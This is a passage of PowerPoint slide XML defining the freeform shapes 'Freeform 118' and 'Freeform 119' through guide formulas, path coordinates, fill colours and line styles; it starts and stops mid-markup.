                  <a:gd name="T37" fmla="*/ 13 h 88"/>
                  <a:gd name="T38" fmla="*/ 21 w 88"/>
                  <a:gd name="T39" fmla="*/ 10 h 88"/>
                  <a:gd name="T40" fmla="*/ 20 w 88"/>
                  <a:gd name="T41" fmla="*/ 8 h 88"/>
                  <a:gd name="T42" fmla="*/ 20 w 88"/>
                  <a:gd name="T43" fmla="*/ 8 h 88"/>
                  <a:gd name="T44" fmla="*/ 23 w 88"/>
                  <a:gd name="T45" fmla="*/ 6 h 88"/>
                  <a:gd name="T46" fmla="*/ 26 w 88"/>
                  <a:gd name="T47" fmla="*/ 6 h 88"/>
                  <a:gd name="T48" fmla="*/ 30 w 88"/>
                  <a:gd name="T49" fmla="*/ 6 h 88"/>
                  <a:gd name="T50" fmla="*/ 37 w 88"/>
                  <a:gd name="T51" fmla="*/ 8 h 88"/>
                  <a:gd name="T52" fmla="*/ 44 w 88"/>
                  <a:gd name="T53" fmla="*/ 7 h 88"/>
                  <a:gd name="T54" fmla="*/ 50 w 88"/>
                  <a:gd name="T55" fmla="*/ 5 h 88"/>
                  <a:gd name="T56" fmla="*/ 56 w 88"/>
                  <a:gd name="T57" fmla="*/ 4 h 88"/>
                  <a:gd name="T58" fmla="*/ 58 w 88"/>
                  <a:gd name="T59" fmla="*/ 5 h 88"/>
                  <a:gd name="T60" fmla="*/ 60 w 88"/>
                  <a:gd name="T61" fmla="*/ 6 h 88"/>
                  <a:gd name="T62" fmla="*/ 63 w 88"/>
                  <a:gd name="T63" fmla="*/ 6 h 88"/>
                  <a:gd name="T64" fmla="*/ 67 w 88"/>
                  <a:gd name="T65" fmla="*/ 4 h 88"/>
                  <a:gd name="T66" fmla="*/ 71 w 88"/>
                  <a:gd name="T67" fmla="*/ 0 h 88"/>
                  <a:gd name="T68" fmla="*/ 74 w 88"/>
                  <a:gd name="T69" fmla="*/ 3 h 88"/>
                  <a:gd name="T70" fmla="*/ 77 w 88"/>
                  <a:gd name="T71" fmla="*/ 7 h 88"/>
                  <a:gd name="T72" fmla="*/ 78 w 88"/>
                  <a:gd name="T73" fmla="*/ 8 h 88"/>
                  <a:gd name="T74" fmla="*/ 78 w 88"/>
                  <a:gd name="T75" fmla="*/ 14 h 88"/>
                  <a:gd name="T76" fmla="*/ 79 w 88"/>
                  <a:gd name="T77" fmla="*/ 18 h 88"/>
                  <a:gd name="T78" fmla="*/ 85 w 88"/>
                  <a:gd name="T79" fmla="*/ 25 h 88"/>
                  <a:gd name="T80" fmla="*/ 86 w 88"/>
                  <a:gd name="T81" fmla="*/ 28 h 88"/>
                  <a:gd name="T82" fmla="*/ 88 w 88"/>
                  <a:gd name="T83" fmla="*/ 32 h 88"/>
                  <a:gd name="T84" fmla="*/ 88 w 88"/>
                  <a:gd name="T85" fmla="*/ 37 h 88"/>
                  <a:gd name="T86" fmla="*/ 87 w 88"/>
                  <a:gd name="T87" fmla="*/ 41 h 88"/>
                  <a:gd name="T88" fmla="*/ 84 w 88"/>
                  <a:gd name="T89" fmla="*/ 46 h 88"/>
                  <a:gd name="T90" fmla="*/ 81 w 88"/>
                  <a:gd name="T91" fmla="*/ 50 h 88"/>
                  <a:gd name="T92" fmla="*/ 74 w 88"/>
                  <a:gd name="T93" fmla="*/ 56 h 88"/>
                  <a:gd name="T94" fmla="*/ 69 w 88"/>
                  <a:gd name="T95" fmla="*/ 62 h 88"/>
                  <a:gd name="T96" fmla="*/ 68 w 88"/>
                  <a:gd name="T97" fmla="*/ 64 h 88"/>
                  <a:gd name="T98" fmla="*/ 60 w 88"/>
                  <a:gd name="T99" fmla="*/ 82 h 88"/>
                  <a:gd name="T100" fmla="*/ 26 w 88"/>
                  <a:gd name="T101" fmla="*/ 82 h 88"/>
                  <a:gd name="T102" fmla="*/ 17 w 88"/>
                  <a:gd name="T103" fmla="*/ 82 h 88"/>
                  <a:gd name="T104" fmla="*/ 15 w 88"/>
                  <a:gd name="T105" fmla="*/ 82 h 88"/>
                  <a:gd name="T106" fmla="*/ 11 w 88"/>
                  <a:gd name="T107" fmla="*/ 85 h 88"/>
                  <a:gd name="T108" fmla="*/ 8 w 88"/>
                  <a:gd name="T109" fmla="*/ 88 h 88"/>
                  <a:gd name="T110" fmla="*/ 5 w 88"/>
                  <a:gd name="T111" fmla="*/ 88 h 88"/>
                  <a:gd name="T112" fmla="*/ 1 w 88"/>
                  <a:gd name="T113" fmla="*/ 87 h 88"/>
                  <a:gd name="T114" fmla="*/ 0 w 88"/>
                  <a:gd name="T115" fmla="*/ 86 h 88"/>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88"/>
                  <a:gd name="T175" fmla="*/ 0 h 88"/>
                  <a:gd name="T176" fmla="*/ 88 w 88"/>
                  <a:gd name="T177" fmla="*/ 88 h 88"/>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88" h="88">
                    <a:moveTo>
                      <a:pt x="0" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="86"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36386" name="Freeform 118"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3263" y="2707"/>
                <a:ext cx="236" cy="183"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 155 w 236"/>
                  <a:gd name="T1" fmla="*/ 69 h 183"/>
                  <a:gd name="T2" fmla="*/ 158 w 236"/>
                  <a:gd name="T3" fmla="*/ 77 h 183"/>
                  <a:gd name="T4" fmla="*/ 168 w 236"/>
                  <a:gd name="T5" fmla="*/ 89 h 183"/>
                  <a:gd name="T6" fmla="*/ 177 w 236"/>
                  <a:gd name="T7" fmla="*/ 95 h 183"/>
                  <a:gd name="T8" fmla="*/ 211 w 236"/>
                  <a:gd name="T9" fmla="*/ 107 h 183"/>
                  <a:gd name="T10" fmla="*/ 234 w 236"/>
                  <a:gd name="T11" fmla="*/ 110 h 183"/>
                  <a:gd name="T12" fmla="*/ 207 w 236"/>
                  <a:gd name="T13" fmla="*/ 142 h 183"/>
                  <a:gd name="T14" fmla="*/ 190 w 236"/>
                  <a:gd name="T15" fmla="*/ 160 h 183"/>
                  <a:gd name="T16" fmla="*/ 172 w 236"/>
                  <a:gd name="T17" fmla="*/ 160 h 183"/>
                  <a:gd name="T18" fmla="*/ 164 w 236"/>
                  <a:gd name="T19" fmla="*/ 162 h 183"/>
                  <a:gd name="T20" fmla="*/ 157 w 236"/>
                  <a:gd name="T21" fmla="*/ 167 h 183"/>
                  <a:gd name="T22" fmla="*/ 153 w 236"/>
                  <a:gd name="T23" fmla="*/ 171 h 183"/>
                  <a:gd name="T24" fmla="*/ 142 w 236"/>
                  <a:gd name="T25" fmla="*/ 172 h 183"/>
                  <a:gd name="T26" fmla="*/ 131 w 236"/>
                  <a:gd name="T27" fmla="*/ 175 h 183"/>
                  <a:gd name="T28" fmla="*/ 124 w 236"/>
                  <a:gd name="T29" fmla="*/ 172 h 183"/>
                  <a:gd name="T30" fmla="*/ 116 w 236"/>
                  <a:gd name="T31" fmla="*/ 173 h 183"/>
                  <a:gd name="T32" fmla="*/ 110 w 236"/>
                  <a:gd name="T33" fmla="*/ 177 h 183"/>
                  <a:gd name="T34" fmla="*/ 103 w 236"/>
                  <a:gd name="T35" fmla="*/ 183 h 183"/>
                  <a:gd name="T36" fmla="*/ 93 w 236"/>
                  <a:gd name="T37" fmla="*/ 181 h 183"/>
                  <a:gd name="T38" fmla="*/ 80 w 236"/>
                  <a:gd name="T39" fmla="*/ 180 h 183"/>
                  <a:gd name="T40" fmla="*/ 59 w 236"/>
                  <a:gd name="T41" fmla="*/ 167 h 183"/>
                  <a:gd name="T42" fmla="*/ 46 w 236"/>
                  <a:gd name="T43" fmla="*/ 165 h 183"/>
                  <a:gd name="T44" fmla="*/ 44 w 236"/>
                  <a:gd name="T45" fmla="*/ 163 h 183"/>
                  <a:gd name="T46" fmla="*/ 44 w 236"/>
                  <a:gd name="T47" fmla="*/ 155 h 183"/>
                  <a:gd name="T48" fmla="*/ 39 w 236"/>
                  <a:gd name="T49" fmla="*/ 152 h 183"/>
                  <a:gd name="T50" fmla="*/ 33 w 236"/>
                  <a:gd name="T51" fmla="*/ 147 h 183"/>
                  <a:gd name="T52" fmla="*/ 25 w 236"/>
                  <a:gd name="T53" fmla="*/ 131 h 183"/>
                  <a:gd name="T54" fmla="*/ 12 w 236"/>
                  <a:gd name="T55" fmla="*/ 117 h 183"/>
                  <a:gd name="T56" fmla="*/ 4 w 236"/>
                  <a:gd name="T57" fmla="*/ 115 h 183"/>
                  <a:gd name="T58" fmla="*/ 0 w 236"/>
                  <a:gd name="T59" fmla="*/ 113 h 183"/>
                  <a:gd name="T60" fmla="*/ 2 w 236"/>
                  <a:gd name="T61" fmla="*/ 104 h 183"/>
                  <a:gd name="T62" fmla="*/ 11 w 236"/>
                  <a:gd name="T63" fmla="*/ 105 h 183"/>
                  <a:gd name="T64" fmla="*/ 16 w 236"/>
                  <a:gd name="T65" fmla="*/ 103 h 183"/>
                  <a:gd name="T66" fmla="*/ 18 w 236"/>
                  <a:gd name="T67" fmla="*/ 90 h 183"/>
                  <a:gd name="T68" fmla="*/ 20 w 236"/>
                  <a:gd name="T69" fmla="*/ 75 h 183"/>
                  <a:gd name="T70" fmla="*/ 22 w 236"/>
                  <a:gd name="T71" fmla="*/ 66 h 183"/>
                  <a:gd name="T72" fmla="*/ 27 w 236"/>
                  <a:gd name="T73" fmla="*/ 66 h 183"/>
                  <a:gd name="T74" fmla="*/ 31 w 236"/>
                  <a:gd name="T75" fmla="*/ 64 h 183"/>
                  <a:gd name="T76" fmla="*/ 33 w 236"/>
                  <a:gd name="T77" fmla="*/ 48 h 183"/>
                  <a:gd name="T78" fmla="*/ 39 w 236"/>
                  <a:gd name="T79" fmla="*/ 38 h 183"/>
                  <a:gd name="T80" fmla="*/ 49 w 236"/>
                  <a:gd name="T81" fmla="*/ 33 h 183"/>
                  <a:gd name="T82" fmla="*/ 54 w 236"/>
                  <a:gd name="T83" fmla="*/ 16 h 183"/>
                  <a:gd name="T84" fmla="*/ 55 w 236"/>
                  <a:gd name="T85" fmla="*/ 8 h 183"/>
                  <a:gd name="T86" fmla="*/ 60 w 236"/>
                  <a:gd name="T87" fmla="*/ 9 h 183"/>
                  <a:gd name="T88" fmla="*/ 66 w 236"/>
                  <a:gd name="T89" fmla="*/ 5 h 183"/>
                  <a:gd name="T90" fmla="*/ 75 w 236"/>
                  <a:gd name="T91" fmla="*/ 0 h 183"/>
                  <a:gd name="T92" fmla="*/ 79 w 236"/>
                  <a:gd name="T93" fmla="*/ 2 h 183"/>
                  <a:gd name="T94" fmla="*/ 89 w 236"/>
                  <a:gd name="T95" fmla="*/ 6 h 183"/>
                  <a:gd name="T96" fmla="*/ 93 w 236"/>
                  <a:gd name="T97" fmla="*/ 2 h 183"/>
                  <a:gd name="T98" fmla="*/ 98 w 236"/>
                  <a:gd name="T99" fmla="*/ 5 h 183"/>
                  <a:gd name="T100" fmla="*/ 103 w 236"/>
                  <a:gd name="T101" fmla="*/ 5 h 183"/>
                  <a:gd name="T102" fmla="*/ 106 w 236"/>
                  <a:gd name="T103" fmla="*/ 6 h 183"/>
                  <a:gd name="T104" fmla="*/ 116 w 236"/>
                  <a:gd name="T105" fmla="*/ 10 h 183"/>
                  <a:gd name="T106" fmla="*/ 125 w 236"/>
                  <a:gd name="T107" fmla="*/ 16 h 183"/>
                  <a:gd name="T108" fmla="*/ 136 w 236"/>
                  <a:gd name="T109" fmla="*/ 26 h 183"/>
                  <a:gd name="T110" fmla="*/ 142 w 236"/>
                  <a:gd name="T111" fmla="*/ 34 h 183"/>
                  <a:gd name="T112" fmla="*/ 148 w 236"/>
                  <a:gd name="T113" fmla="*/ 39 h 183"/>
                  <a:gd name="T114" fmla="*/ 140 w 236"/>
                  <a:gd name="T115" fmla="*/ 51 h 183"/>
                  <a:gd name="T116" fmla="*/ 139 w 236"/>
                  <a:gd name="T117" fmla="*/ 55 h 183"/>
                  <a:gd name="T118" fmla="*/ 144 w 236"/>
                  <a:gd name="T119" fmla="*/ 63 h 183"/>
                  <a:gd name="T120" fmla="*/ 153 w 236"/>
                  <a:gd name="T121" fmla="*/ 62 h 183"/>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36"/>
                  <a:gd name="T184" fmla="*/ 0 h 183"/>
                  <a:gd name="T185" fmla="*/ 236 w 236"/>
                  <a:gd name="T186" fmla="*/ 183 h 183"/>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36" h="183">
                    <a:moveTo>
                      <a:pt x="157" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="155" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="63"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36387" name="Freeform 119"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3263" y="2707"/>
                <a:ext cx="236" cy="183"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 155 w 236"/>
                  <a:gd name="T1" fmla="*/ 69 h 183"/>
                  <a:gd name="T2" fmla="*/ 158 w 236"/>
                  <a:gd name="T3" fmla="*/ 77 h 183"/>
                  <a:gd name="T4" fmla="*/ 168 w 236"/>
                  <a:gd name="T5" fmla="*/ 89 h 183"/>
                  <a:gd name="T6" fmla="*/ 177 w 236"/>
                  <a:gd name="T7" fmla="*/ 95 h 183"/>
                  <a:gd name="T8" fmla="*/ 211 w 236"/>
                  <a:gd name="T9" fmla="*/ 107 h 183"/>
                  <a:gd name="T10" fmla="*/ 234 w 236"/>
                  <a:gd name="T11" fmla="*/ 110 h 183"/>
                  <a:gd name="T12" fmla="*/ 207 w 236"/>
                  <a:gd name="T13" fmla="*/ 142 h 183"/>
                  <a:gd name="T14" fmla="*/ 190 w 236"/>
                  <a:gd name="T15" fmla="*/ 160 h 183"/>
                  <a:gd name="T16" fmla="*/ 172 w 236"/>
                  <a:gd name="T17" fmla="*/ 160 h 183"/>
                  <a:gd name="T18" fmla="*/ 164 w 236"/>
                  <a:gd name="T19" fmla="*/ 162 h 183"/>
                  <a:gd name="T20" fmla="*/ 157 w 236"/>
                  <a:gd name="T21" fmla="*/ 167 h 183"/>
                  <a:gd name="T22" fmla="*/ 153 w 236"/>
                  <a:gd name="T23" fmla="*/ 171 h 183"/>
                  <a:gd name="T24" fmla="*/ 142 w 236"/>
                  <a:gd name="T25" fmla="*/ 172 h 183"/>
                  <a:gd name="T26" fmla="*/ 131 w 236"/>
                  <a:gd name="T27" fmla="*/ 175 h 183"/>
                  <a:gd name="T28" fmla="*/ 124 w 236"/>
                  <a:gd name="T29" fmla="*/ 172 h 183"/>
